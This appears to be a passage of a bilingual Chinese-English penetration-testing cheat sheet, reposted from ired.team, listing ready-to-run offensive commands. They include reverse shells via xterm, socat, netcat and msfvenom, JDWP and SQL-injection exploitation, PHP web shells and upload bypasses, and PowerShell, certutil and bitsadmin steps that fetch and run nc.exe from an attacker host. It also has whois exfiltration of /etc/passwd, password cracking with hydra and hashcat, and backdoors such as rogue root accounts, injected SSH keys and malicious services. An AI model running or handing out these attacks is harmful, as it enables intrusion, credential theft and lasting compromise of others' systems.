反弹shell最简单的形式之一就是xterm会话,应在服务器上运行以下命令.它将尝试TCP端口6001上连接你的(10.0.0.1)

xterm -display 10.0.0.1:1

传入xterm,启动X-Server(1-监听TCP 6001).一种方法使用Xnest(在你系统上运行)
Xnest:1
你需要在授权目标上连接你
xhost + targetip

JDWP远程命运执行漏洞

漏洞验证:

telnet端口后,输入命令JDWP-Handshake,如果返回JDWP-Handshake,证明存在漏洞。而且如果输入JDWP-Handshake的速度不够快的话,连接很快就会断开。

1
telnet 目标IP 目标端口

漏洞利用脚本:https://github.com/IOActive/jdwp-shellifier

使用方法:

1
python jdwp-shellifier.py -t 目标主机ip -p jdwp运行端口 --cmd "Your Command"

比如我们可以执行一个反弹shell的命令:

漏洞利用过程如下:

攻击者主机上执行监听命令:

1
nc -lvvp 1234

被攻击的目标主机上执行命令:

1
python jdwp-shellifier.py -t 127.0.0.1 -p 8000 --cmd "ncat -lvvp 1234 -e /bin/bash"

修复建议:

1
2
关闭JDWP端口,或者JDWP端口不对公网开放
关闭Java的debug模式(开启该模式对服务器性能有影响)

参考链接:https://www.bugbank.cn/pwn/detail/5750445bbcd7a4e777c3dcb2.html

https://blog.csdn.net/wanzt123/article/details/82793023

Working with Restricted Shells

1
2
# rare cases
ssh bill@localhost ls -l /tmp
1
nice /bin/bash

Interactive TTY Shells

1
/usr/bin/expect sh
1
2
3
python -c ‘import pty; pty.spawn(“/bin/sh”)’
# execute one command with su as another user if you do not have access to the shell. Credit to g0blin.co.uk
python -c 'import pty,subprocess,os,time;(master,slave)=pty.openpty();p=subprocess.Popen(["/bin/su","-c","id","bynarr"],stdin=slave,stdout=slave,stderr=slave);os.read(master,1024);os.write(master,"fruity\n");time.sleep(0.1);print os.read(master,1024);'

使用socat

1
2
3
4
#Listener
socat file:'tty',raw,echo=0 tcp-listen:4444
#Victim
socat exec:'bash -li',pty,stderr,setsid,sigint tcp:10.0.3,4:4444

参考链接:https://www.anquanke.com/post/id/86444

通过form表单进行文件上传

1
2
3
4
5
# POST file
curl -X POST -F "file=@/file/location/shell.php" http://$TARGET/upload.php --cookie "cookie"

# POST binary data to web form
curl -F "field=<shell.zip" http://$TARGET/upld.php -F 'k=v' --cookie "k=v;" -F "submit=true" -L -v

PUT方法

1
curl -X PUT -d '<?php system($_GET["c"]);?>' http://192.168.2.99/shell.php

Payload生成模式和偏移量

1
2
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2000
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q $EIP_VALUE

Bypassing File Upload

1
2
3
4
5
6
7
file.php -> file.jpg
file.php -> file.php.jpg
file.asp -> file.asp;.jpg
file.gif (contains php code, but starts with string GIF/GIF98)
00%
file.jpg with php backdoor in exif (see below)
.jpg -> proxy intercept -> rename to .php

图片里面注入Code

1
2
exiv2 -c'A "<?php system($_REQUEST['cmd']);?>"!' backdoor.jpeg
exiftool “-comment<=back.php” back.png

.htaccess技巧

1
AddType application/x-httpd-php .blah

密码破解

hydra

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
破解ssh: 
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh
hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh

破解ftp:
hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV
hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV

get方式提交,破解web登录:
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php

post方式提交,破解web登录:
hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password"
hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:<title>wrong username or password</title>"
(参数说明:-t同时线程数3,-l用户名是admin,字典pass.txt,保存为out.txt,-f 当破解了一个密码就停止, 10.36.16.18目标ip,http-post-form表示破解是采用http的post方式提交的表单密码破解,<title>中 的内容是表示错误猜解的返回信息提示。)

破解https:
hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https

破解teamspeak:
hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak

破解cisco:
hydra -P pass.txt 10.36.16.18 cisco
hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable

破解smb:
hydra -l administrator -P pass.txt 10.36.16.18 smb

破解pop3:
hydra -l muts -P pass.txt my.pop3.mail pop3

破解rdp:
hydra ip rdp -l administrator -P pass.txt -V

破解http-proxy:
hydra -l admin -P pass.txt http-proxy://10.36.16.18

破解imap:
hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

web爆破
hydra 10.10.10.52 http-post-form -L /usr/share/wordlists/list "/endpoit/login:usernameField=^USER^&passwordField=^PASS^:unsuccessfulMessage" -s PORT -P /usr/share/wordlists/list

其他类型爆破
hydra 10.10.10.52 -l username -P /usr/share/wordlists/list ftp|ssh|smb://10.0.0.1

hashcat

1
2
3
4
5
6
7
8
9
10
11
12
13
# Bruteforce based on the pattern;
hashcat -a3 -m0 mantas?d?d?d?u?u?u --force --potfile-disable --stdout

# Generate password candidates: wordlist + pattern;
hashcat -a6 -m0 "e99a18c428cb38d5f260853678922e03" yourPassword|/usr/share/wordlists/rockyou.txt ?d?d?d?u?u?u --force --potfile-disable --stdout

# Generate NetNLTMv2 with internalMonologue and crack with hashcat
InternalMonologue.exe -Downgrade False -Restore False -Impersonate True -Verbose False -challange 002233445566778888800
# resulting hash
spotless::WS01:1122334455667788:26872b3197acf1da493228ac1a54c67c:010100000000000078b063fbcce8d4012c90747792a3cbca0000000008003000300000000000000001000000002000006402330e5e71fb781eef13937448bf8b0d8bc9e2e6a1e1122fd9d690fa9178c50a0010000000000000000000000000000000000009001a0057005300300031005c00730070006f0074006c006500730073000000000000000000

# crack with hashcat
hashcat -m5600 'spotless::WS01:1122334455667788:26872b3197acf1da493228ac1a54c67c:010100000000000078b063fbcce8d4012c90747792a3cbca0000000008003000300000000000000001000000002000006402330e5e71fb781eef13937448bf8b0d8bc9e2e6a1e1122fd9d690fa9178c50a0010000000000000000000000000000000000009001a0057005300300031005c00730070006f0074006c006500730073000000000000000000' -a 3 /usr/share/wordlists/rockyou.txt --force --potfile-disable

msfvenom

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.245 LPORT=443 -f c -a x86 --platform windows -b "\x00\x0a\x0d" -e x86/shikata_ga_nai

#LINUX
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

#WINDOWS
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

#MAC
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho

#PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

#JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

#WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war

#PYTHON
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

#BASH
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh

#PERL
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

#Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

#Windows Based Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

#Mac Based Shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Compiling Code From Linux

1
2
3
4
5
# Windows
i686-w64-mingw32-gcc source.c -lws2_32 -o out.exe

# Linux
gcc -m32|-m64 -o output source.c

本地包含shell

1
2
3
4
5
6
nc 192.168.1.102 80
GET /<?php passthru($_GET['cmd']); ?> HTTP/1.1
Host: 192.168.1.102
Connection: close

# Then send as cmd payload via http://192.168.1.102/index.php?page=../../../../../var/log/apache2/access.log&cmd=id

本地文件包含到任意文件读取

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
file:///etc/passwd

http://example.com/index.php?page=php://input&cmd=ls
POST: <?php system($_GET['cmd']); ?>
http://192.168.2.237/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input
POST: <?php system('uname -a');die(); ?>

expect://whoami
http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=&cmd=id
http://10.1.1.1/index.php?page=data://text/plain,%3C?php%20system%28%22uname%20-a%22%29;%20?%3E

# ZIP Wrapper
echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;
zip payload.zip payload.php;
mv payload.zip shell.jpg;
http://example.com/index.php?page=zip://shell.jpg%23payload.php

# Loop through file descriptors
curl '' -H 'Cookie: PHPSESSID=df74dce800c96bcac1f59d3b3d42087d' --output -

远程文件shell:Windows+php

1
2
3
4
5
6
7
<?php system("powershell -Command \"& {(New-Object System.Net.WebClient).DownloadFile('http://10.11.0.245/netcat/nc.exe','nc.exe'); cmd /c nc.exe 10.11.0.245 4444 -e cmd.exe\" }"); ?>

ps:
cmd /c dir 是执行完dir命令后关闭命令窗口。
cmd /k dir 是执行完dir命令后不关闭命令窗口。
cmd /c start dir 会打开一个新窗口后执行dir指令,原窗口会关闭。
cmd /k start dir 会打开一个新窗口后执行dir指令,原窗口不会关闭。

sql注入

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
http://IP/less-1/index.php?id=2' and 1=2 union select 1,version(),@@basedir--+  // 查询数据库版本号,数据库路径

http://IP/less-1/index.php?id=2' and 1=2 union select 1,schema_name,3 from information_schema.schemata limit 3,1 --+ //查找数据库名 --> 得出 第三个数据库名为 security

ttp://IP/less-1/index.php?id=2' and 1=2 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 3,1 --+ // 在数据库中查询表名

http://IP/less-1/index.php?id=2' and 1=2 union select 1,column_name,3 from information_schema.columns where table_name='users' limit 1,1 --+ // 在表中查询相应字段名

http://IP/less-1/index.php?id=2' and 1=2 union select 1,username,password from security.users limit 1,1 --+ // 分别得到 这两个字段的 字段2,3

http://ip/less-1/index.php?id=2' and 1=2 union select 1,load_file('d:/1.txt'),3 --+ //读取文件

http://target/index.php?vulnParam=0' UNION ALL SELECT 1,"<?php system($_REQUEST['cmd']);?>",2,3 INTO OUTFILE "c:/evil.php"-- uMj //上传shell

select @@basedir 查询数据库安装路径
select @@datadir 查询数据库所在目录
select version() 查询数据库的版本
select user() 查询当前数据库的使用用户
select database() 当前使用数据库的名字

# sqlmap; post-request - captured request via Burp Proxy via Save Item to File.
sqlmap -r post-request -p item --level=5 --risk=3 --dbms=mysql --os-shell --threads 10

# netcat reverse shell via mssql injection when xp_cmdshell is available//xp_cmdshell
1000';+exec+master.dbo.xp_cmdshell+'(echo+open+10.11.0.245%26echo+anonymous%26echo+whatever%26echo+binary%26echo+get+nc.exe%26echo+bye)+>+c:\ftp.txt+%26+ftp+-s:c:\ftp.txt+%26+nc.exe+10.11.0.245+443+-e+cmd';--

SQLite Injection to Shell or Backdoor

1
2
3
ATTACH DATABASE '/home/www/public_html/uploads/phpinfo.php' as pwn; 
CREATE TABLE pwn.shell (code TEXT);
INSERT INTO pwn.shell (code) VALUES ('<?php system($_REQUEST['cmd']);?>');

MS-SQL Console

1
2
3
4
mssqlclient.py -port 27900 user:password@10.1.1.1
sqsh -S 10.1.1.1 -U user -P password

mysqlclent.py -->https://github.com/SecureAuthCorp/impacket/blob/master/examples/mssqlclient.py

无交互式Shell

1
2
python -c 'import pty; pty.spawn("/bin/sh")'
/bin/busybox sh

Python代码执行

1
__import__('os').system('id')

Local Enumeration & Privilege Escalation

https://github.com/sagishahar/lpeworkshop

ImmunityDebugger

Get Loaded Modules

1
2
# We're interested in modules without protection, Read & Execute permissions
!mona modules

Finding JMP ESP Address

1
!mona find -s "\xFF\xE4" -m moduleName

ZIP爆破

1
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt bank-account.zip

参数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
USAGE: fcrackzip
[-b|--brute-force] use brute force algorithm 暴破
[-D|--dictionary] use a dictionary 字典模式
[-B|--benchmark] execute a small benchmark 速度测试
[-c|--charset characterset] use characters from charset 指定字符类型(数字,字母,混合等)
[-h|--help] show this message
[--version] show the version of this program
[-V|--validate] sanity-check the algortihm
[-v|--verbose] be more verbose
[-p|--init-password string] use string as initial password/file 指定开始字符(比如要只记得密码是5开头的6位纯数字,可以指定从5000000开始破解,节约时间)
[-l|--length min-max] check password with length min to max (指定密码长度区间)
[-u|--use-unzip] use unzip to weed out wrong passwords  (这个选项很很重要,很重要)
[-m|--method num] use method number "num" (see below) (指定破解类型)
[-2|--modulo r/m] only calculcate 1/m of the password
file... the zipfiles to crack

不知密码长度的情况下

1
fcrackzip -b -c1 -u test.zip (-b 指定模式为暴破,-c1指定密码类型为纯数字,其它类型可以rtfm,-u这个参数非常重要不然不显示破解出来的密码,-l 5-6可以指定长度)

参考链接:https://blog.csdn.net/u011500307/article/details/17371651

Setting up Simple HTTP server

1
2
3
4
5
# Linux
python -m SimpleHTTPServer 80
python3 -m http.server
ruby -r webrick -e "WEBrick::HTTPServer.new(:Port => 80, :DocumentRoot => Dir.pwd).start"
php -S 0.0.0.0:80

mysql提权

1
raptor_udf2.c and sid-shell.c or full tarball
1
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
1
2
3
4
5
6
use mysql;
create table npn(line blob);
insert into npn values(load_file('/tmp/raptor_udf2.so'));
select * from npn into dumpfile '/usr/lib/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';
select do_system('chown root:root /tmp/sid-shell; chmod +s /tmp/sid-shell');

参考链接:https://ejtaal.net/infosec/lordoftheroot/index.html

Docker提权

1
echo -e "FROM ubuntu:14.04\nENV WORKDIR /stuff\nRUN mkdir -p /stuff\nVOLUME [ /stuff ]\nWORKDIR /stuff" > Dockerfile && docker build -t my-docker-image . && docker run -v $PWD:/stuff -t my-docker-image /bin/sh -c 'cp /bin/sh /stuff && chown root.root /stuff/sh && chmod a+s /stuff/sh' && ./sh -c id && ./sh

重置root用户密码

1
echo "root:spotless" | chpasswd   //非交互式修改密码

上传文件到目标

TFTP

1
2
3
4
5
#TFTP Linux: cat /etc/default/atftpd to find out file serving location; default in kali /srv/tftp
service atftpd start

# Windows
tftp -i $ATTACKER get /download/location/file /save/location/file

FTP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
# Linux: set up ftp server with anonymous logon access;
twistd -n ftp -p 21 -r /file/to/serve

# Windows shell: read FTP commands from ftp-commands.txt non-interactively;
echo open $ATTACKER>ftp-commands.txt
echo anonymous>>ftp-commands.txt
echo whatever>>ftp-commands.txt
echo binary>>ftp-commands.txt
echo get file.exe>>ftp-commands.txt
echo bye>>ftp-commands.txt
ftp -s:ftp-commands.txt

# Or just a one-liner
(echo open 10.11.0.245&echo anonymous&echo whatever&echo binary&echo get nc.exe&echo bye) > ftp.txt & ftp -s:ftp.txt & nc.exe 10.11.0.245 443 -e cmd

CertUtil

1
2
3
4
5
6
7
下载:
CertUtilcertutil -urlcache -split -f bad.exe //保存在当前路径,文件名称和下载文件名称相同
certutil -urlcache -split -f bad.exe bad1.exe //保存在当前路径,指定保存文件名称
certutil -urlcache -f bad.exe //缓存目录位置: %USERPROFILE%\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content

上传:
certutil -urlcache -f bad.exe delete

参考链接:https://www.cnblogs.com/backlion/p/7325228.html

PHP

1
<?php file_put_contents("/var/tmp/shell.php", file_get_contents("http://10.11.0.245/shell.php")); ?>

Python

1
python -c "from urllib import urlretrieve; urlretrieve('http://10.11.0.245/nc.exe', 'C:\\Temp\\nc.exe')"

HTTP: Powershell

1
2
3
4
5
6
7
powershell -Command "& {(New-Object System.Net.WebClient).DownloadFile('http://$ATTACKER/nc.exe','nc.exe'); cmd /c nc.exe $ATTACKER 4444 -e cmd.exe" }
powershell -Command "& {(New-Object System.Net.WebClient).DownloadFile('http://$ATTACKER/nc.exe','nc.exe'); Start-Process nc.exe -NoNewWindow -Argumentlist '$ATTACKER 4444 -e cmd.exe'" }
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('http://$ATTACKER/nc.exe','nc.exe')"; Start-Process nc.exe -NoNewWindow -Argumentlist '$ATTACKER 4444 -e cmd.exe'"
powershell (New-Object System.Net.WebClient).DownloadFile('http://$ATTACKER/file.exe','file.exe');(New-Object -com Shell.Application).ShellExecute('file.exe');

# download using default proxy credentials and launch
powershell -command { $b=New-Object System.Net.WebClient; $b.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials; $b.DownloadString("http://$attacker/nc.exe") | Out-File nc.exe; Start-Process nc.exe -NoNewWindow -Argumentlist '$ATTACKER 4444 -e cmd.exe'" }

HTTP: VBScript

1
cscript wget.vbs http://$ATTACKER/file.exe localfile.exe

HTTP: Linux

1
2
3
wget http://$ATTACKER/file
curl http://$ATTACKER/file -O
scp ~/file/file.bin user@$TARGET:tmp/backdoor.py

Netcat

1
2
3
4
5
# Attacker
nc -l -p 4444 < /tool/file.exe

# Victim
nc $ATTACKER 4444 > file.exe

HTTP: Windows “debug.exe” Method

1
2
3
# 1. In Linux, convert binary to hex ascii:
wine /usr/share/windows-binaries/exe2bat.exe /root/tools/netcat/nc.exe nc.txt
# 2. Paste nc.txt into Windows Shell.

HTTP: Windows BitsAdmin

1
cmd.exe /c "bitsadmin /transfer myjob /download /priority high http://$ATTACKER/payload.exe %tmp%\payload.exe&start %tmp%\payload.exe

Whois Data Exfiltration

1
2
3
4
# attacker
nc -l -v -p 43 | sed "s/ //g" | base64 -d
# victim
whois -h $attackerIP -p 43 `cat /etc/passwd | base64`

Cancel 数据泄露

1
cancel -u "$(cat /etc/passwd)" -h ip:port

rlogin数据泄露

1
rlogin -l "$(cat /etc/passwd)" -p port host

指定范围ping

1
2
3
4
#!/bin/bash
for lastOctet in {1..254}; do
ping -c 1 10.0.0.$lastOctet | grep "bytes from" | cut -d " " -f 4 | cut -d ":" -f 1 &
done

爆破XOR

1
2
3
encrypted = "encrypted-string-here"
for i in range(0,255):
print("".join([chr(ord(e) ^ i) for e in encrypted]))

生成错误字符

1
2
# Python
'\\'.join([ "x{:02x}".format(i) for i in range(1,256) ])
1
2
# Bash
for i in {1..255}; do printf "\\\x%02x" $i; done; echo -e "\r"

.py -> .exe

1
python pyinstaller.py --onefile convert-to-exe.py

Netcat Portscan

1
2
nc -nvv -w 1 -z host 1000-2000
nc -nv -u -z -w 1 host 160-162

渗透Windows 服务

1
2
3
4
5
6
# Look for SERVICE_ALL_ACCESS in the output
accesschk.exe /accepteula -uwcqv "Authenticated Users" *

sc config [service_name] binpath= "C:\nc.exe 10.11.0.245 443 -e C:\WINDOWS\System32\cmd.exe" obj= "LocalSystem" password= ""
sc qc [service_name] (to verify!)
sc start [service_name]

查找为指定用户显式设置的文件/文件夹权限

1
2
icacls.exe C:\folder /findsid userName-or-*sid /t
//look for (F)ull, (M)odify, (W)rite

AlwaysInstallElevated MSI

1
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated & reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

AlwaysInstallElevated是一个策略设置。微软允许非授权用户以SYSTEM权限运行安装文件(MSI),如果用户启用此策略设置,那么黑客利用恶意的MSI文件就可以进行管理员权限的提升

Metasploit PowershellAlwaysInstallElevated提权实战

Windows凭证

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
c:\unattend.xml
c:\sysprep.inf
c:\sysprep\sysprep.xml
dir c:\*vnc.ini /s /b
dir c:\*ultravnc.ini /s /b
dir c:\ /s /b | findstr /si *vnc.ini

findstr /si password *.txt | *.xml | *.ini
findstr /si pass *.txt | *.xml | *.ini
dir /s *cred* == *pass* == *.conf

# Windows Autologon
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

# VNC
reg query "HKCU\Software\ORL\WinVNC3\Password"

# Putty
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"

# Registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

没带引号的服务路径

1
2
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
wmic service get name,displayname,pathname,startmode | findstr /i /v "C:\Windows\\" |findstr /i /v """

服务后门

1
sc create spotlessSrv binpath= "C:\nc.exe 10.11.0.245 443 -e C:\WINDOWS\System32\cmd.exe" obj= "LocalSystem" password= ""

Port Forwarding / SSH Tunneling

SSH: Local Port Forwarding

1
2
3
# Listen on local port 8080 and forward incoming traffic to REMOT_HOST:PORT via SSH_SERVER
# Scenario: access a host that's being blocked by a firewall via SSH_SERVER;
ssh -L 127.0.0.1:8080:REMOTE_HOST:PORT user@SSH_SERVER

SSH: Dynamic Port Forwarding

1
2
3
# Listen on local port 8080. Incoming traffic to 127.0.0.1:8080 forwards it to final destination via SSH_SERVER
# Scenario: proxy your web traffic through SSH tunnel OR access hosts on internal network via a compromised DMZ box;
ssh -D 127.0.0.1:8080 user@SSH_SERVER

SSH远程端口转发

1
2
3
4
# Open port 5555 on SSH_SERVER. Incoming traffic to SSH_SERVER:5555 is tunneled to LOCALHOST:3389
# Scenario: expose RDP on non-routable network;
ssh -R 5555:LOCAL_HOST:3389 user@SSH_SERVER
plink -R ATTACKER:ATTACKER_PORT:127.0.01:80 -l root -pw pw ATTACKER_IP

代理隧道

1
2
3
4
# Open a local port 127.0.0.1:5555. Incoming traffic to 5555 is proxied to DESTINATION_HOST through PROXY_HOST:3128
# Scenario: a remote host has SSH running, but it's only bound to 127.0.0.1, but you want to reach it;
proxytunnel -p PROXY_HOST:3128 -d DESTINATION_HOST:22 -a 5555
ssh user@127.0.0.1 -p 5555

http隧道

1
2
3
4
5
6
7
8
# Server - open port 80. Redirect all incoming traffic to localhost:80 to localhost:22
hts -F localhost:22 80

# Client - open port 8080. Redirect all incoming traffic to localhost:8080 to 192.168.1.15:80
htc -F 8080 192.168.1.15:80

# Client - connect to localhost:8080 -> get tunneled to 192.168.1.15:80 -> get redirected to 192.168.1.15:22
ssh localhost -p 8080

Netsh转发

1
2
# requires admin
netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport

RunAs

runas是Microsoft Windows系列操作系统中的一个命令,允许用户以不同的用户名运行特定的工具和程序,以用于以交互方式登录计算机的用户名。它类似于Unix命令sudo和su,但Unix命令通常需要系统管理员事先配置才能为特定用户和/或命令工作。

powershell

1
2
3
4
5
6
7
8
# Requires PSRemoting
$username = 'Administrator';$password = '1234test';$securePassword = ConvertTo-SecureString $password -AsPlainText -Force;$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;Invoke-Command -Credential $credential -ComputerName COMPUTER_NAME -Command { whoami }

# without PSRemoting
cmd> powershell Start-Process cmd.exe -Credential (New-Object System.Management.Automation.PSCredential 'username', (ConvertTo-SecureString 'password' -AsPlainText -Force))

# without PS Remoting, with arguments
cmd> powershell -command "start-process cmd.exe -argumentlist '/c calc' -Credential (New-Object System.Management.Automation.PSCredential 'username',(ConvertTo-SecureString 'password' -AsPlainText -Force))"

CMD

1
2
# Requires interactive console
runas /user:userName cmd.exe

PsExec

1
psexec -accepteula -u user -p password cmd /c c:\temp\nc.exe 10.11.0.245 80 -e cmd.exe

Pth-WinExe

1
pth-winexe -U user%pass --runas=user%pass //10.1.1.1 cmd.exe

发现隐藏文件

1
dir /A:H /s "c:\program files"

常规的文件搜索操作

1
2
3
4
5
6
7
8
# Query the local db for a quick file find. Run updatedb before executing locate.  //数据库查找文件
locate passwd

# Show which file would be executed in the current environment, depending on $PATH environment variable;
which nc wget curl php perl python netcat tftp telnet ftp

# Search for *.conf (case-insensitive) files recursively starting with /etc;
find /etc -iname *.conf

维持访问

注册表配置单元

1
hivesh /registry/file

hivexsh - Windows注册表配置单元shell

解密VNC的密码

1
wine vncpwdump.exe -k key

创建用户并添加到管理员组

1
net user spotless spotless /add & net localgroup Administrators spotless /add

tips:在无回显的时候,添加失败可能是因为你的密码强度不符合密码策略

SSH keys

1
mkdir /root/.ssh 2>/dev/null; echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQChKCUsFVWj1Nz8SiM01Zw/BOWcMNs2Zwz3MdT7leLU9/Un4mZ7vjco0ctsyh2swjphWr5WZG28BN90+tkyj3su23UzrlgEu3SaOjVgxhkx/Pnbvuua9Qs9gWbWyRxexaC1eDb0pKXHH2Msx+GlyjfDOngq8tR6tkU8u1S4lXKLejaptiz0q6P0CcR6hD42IYkqyuWTNrFdSGLtiPCBDZMZ/5g1cJsyR59n54IpV0b2muE3F7+NPQmLx57IxoPjYPNUbC6RPh/Saf7o/552iOcmVCdLQDR/9I+jdZIgrOpstqSiJooU9+JImlUtAkFxZ9SHvtRbFt47iH7Sh7LiefP5 root@kali' >> /root/.ssh/authorized_keys

创建后门

1
2
3
4
echo 'spotless::0:0:root:/root:/bin/bash' >> /etc/passwd

# Rarely needed, but if you need to add a password to the previously created user by using useradd and passwd is not working. Pwd is "kali"
sed 's/!/\$6$o1\.HFMVM$a3hY6OPT\/DiQYy4koI6Z3\/sLiltsOcFoS5yCKhBBqQLH5K1QlHKL8\/6wJI6uF\/Q7mniOdq92v6yjzlVlXlxkT\./' /etc/shadow > /etc/s2; cat /etc/s2 > /etc/shadow; rm /etc/s2

创建另一个root用户

1
useradd -u0 -g0 -o -s /bin/bash -p `openssl passwd yourpass` rootuser

OpenSSL Password

1
2
openssl passwd -1 password 
# output $1$YKbEkrkZ$7Iy/M3exliD/yJfJVeTn5.

计划任务后门

1
2
# Launch evil.exe every 10 minutes
schtasks /create /sc minute /mo 10 /tn "TaskName" /tr C:\Windows\system32\evil.exe

参考链接:

原文链接:https://ired.team/offensive-security-experiments/offensive-security-cheetsheets#bypassing-file-upload-restrictions

中文链接:https://xz.aliyun.com/t/4555#toc-114

CATALOG
  1. 1. NMAP
    1. 1.1. NMAP实用命令
    2. 1.2. 从Nmap Scan中提取实时IP
    3. 1.3. 简单的端口扫描
  2. 2. DNS lookups, Zone Transfers & Brute-Force
    1. 2.1. DIG用法简析
      1. 2.1.1. DNS 命令输出格式
      2. 2.1.2. DNS 服务器记录类型
      3. 2.1.3. DNS 迭代查询的具体流程
      4. 2.1.4. DNS 缓存
  3. 3. Banner抓取
    1. 3.1. netcat
    2. 3.2. ncat
    3. 3.3. NFS共享
  4. 4. Kerberos域用户名枚举
    1. 4.1. Krbguess
    2. 4.2. Nmap krb5-enum-users NSE脚本
    3. 4.3. Metasploit模块
  5. 5. HTTP Brute-Force & Vulnerability Scanning
    1. 5.1. gohuster
    2. 5.2. wpscan
    3. 5.3. whatweb
  6. 6. RPC/NetBios/SMB
    1. 6.1. RPC
    2. 6.2. smbclient
    3. 6.3. enum4linux
  7. 7. SNMP
    1. 7.1. metasploit
    2. 7.2. Medusa
    3. 7.3. onesixtyone
    4. 7.4. snmpwalk
  8. 8. SMTP
    1. 8.1. smtp-user-enum
    2. 8.2. metasploit
    3. 8.3. nmap脚本
  9. 9. Active Directory
  • Gaining Access
    1. 1. shell反弹
      1. 1.1. Bash
      2. 1.2. Perl
      3. 1.3. Nc
      4. 1.4. URL-Encoded Perl: Linux
      5. 1.5. Python
      6. 1.6. php
      7. 1.7. Ruby
      8. 1.8. Netcat without -e #1
      9. 1.9. Netcat without -e #2
      10. 1.10. Java
      11. 1.11. XTerm
    2. 2. JDWP远程命运执行漏洞
    3. 3. Working with Restricted Shells
    4. 4. Interactive TTY Shells
    5. 5. 通过form表单进行文件上传
    6. 6. PUT方法
    7. 7. Payload生成模式和偏移量
    8. 8. Bypassing File Upload
    9. 9. 图片里面注入Code
    10. 10. .htaccess技巧
    11. 11. 密码破解
      1. 11.1. hydra
      2. 11.2. hashcat
    12. 12. msfvenom
    13. 13. Compiling Code From Linux
    14. 14. 本地包含shell
    15. 15. 本地文件包含到任意文件读取
    16. 16. 远程文件shell:Windows+php
    17. 17. sql注入
    18. 18. SQLite Injection to Shell or Backdoor
    19. 19. MS-SQL Console
    20. 20. 无交互式Shell
